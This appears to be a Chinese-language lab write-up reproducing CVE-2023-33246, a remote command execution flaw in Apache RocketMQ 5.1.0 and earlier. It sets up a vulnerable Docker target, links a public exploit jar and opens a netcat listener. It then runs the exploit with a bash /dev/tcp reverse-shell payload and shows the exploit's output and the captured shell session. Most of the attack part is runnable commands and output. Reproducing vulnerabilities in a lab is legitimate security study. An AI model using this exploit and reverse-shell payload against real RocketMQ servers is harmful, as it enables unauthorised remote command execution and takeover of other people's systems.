CVE-2023-33246复现

Apache RocketMQ 远程命令执行漏洞

影响范围 Apache RocketMQ <= 5.1.0 Apache RocketMQ <= 4.9.5

靶场搭建

  • 靶场环境安装
1
2
docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0
  • 启动namesrv
1
docker run -dit -p 9876:9876 -p 10909:10909 --name mqsrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv /bin/bash
  • 启动broker
1
docker run -dit -p 10908:10908 -p 10911:10911 --name mqbroker --restart=always --link mqsrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /home/rocketmq/rocketmq-4.9.1/conf/broker.conf
  • 启动console
1
docker run -dit --name mqconsole -p 8080:8080 -e "JAVA_OPTS=-Drocketmq.config.namesrvAddr=mqsrv:9876 -Drocketmq.config.isVIPChannel=false" apacherocketmq/rocketmq-console:2.0.0

访问127.0.0.1:8080

EXP复现

https://github.com/SuperZero/CVE-2023-33246

先监听端口

1
nc -lvnp 1122

利用EXP进行反弹shell

1
2
3
4
5
6
java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "bash -i >& /dev/tcp/127.0.0.1/1122 0>&1"
RocketMQLog:WARN No appenders could be found for logger (io.netty.util.internal.InternalThreadLocalMap).
RocketMQLog:WARN Please initialize the logger system properly.
15:24:38.364 [NettyClientSelector_1] INFO RocketmqRemoting - closeChannel: close the connection to remote address[127.0.0.1:9876] result: true
15:24:38.454 [NettyClientSelector_1] INFO RocketmqRemoting - closeChannel: close the connection to remote address[127.0.0.1:10911] result: true
攻击已结束!请稍后查看结果!

拿到shell,攻击成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
sh-4.2$ nc -lvnp 1122
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1122
Ncat: Listening on 0.0.0.0:1122
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:50388.
[rocketmq@fe61c04bb353 bin]$ ls
ls
README.md
cachedog.sh
cleancache.sh
cleancache.v1.sh
dledger
mqadmin
mqadmin.cmd
mqbroker
mqbroker.cmd
mqbroker.numanode0
mqbroker.numanode1
mqbroker.numanode2
mqbroker.numanode3
mqnamesrv
mqnamesrv.cmd
mqshutdown
mqshutdown.cmd
os.sh
play.cmd
play.sh
runbroker.cmd
runbroker.sh
runserver.cmd
runserver.sh
setcache.sh
startfsrv.sh
tools.cmd
tools.sh
[rocketmq@fe61c04bb353 bin]$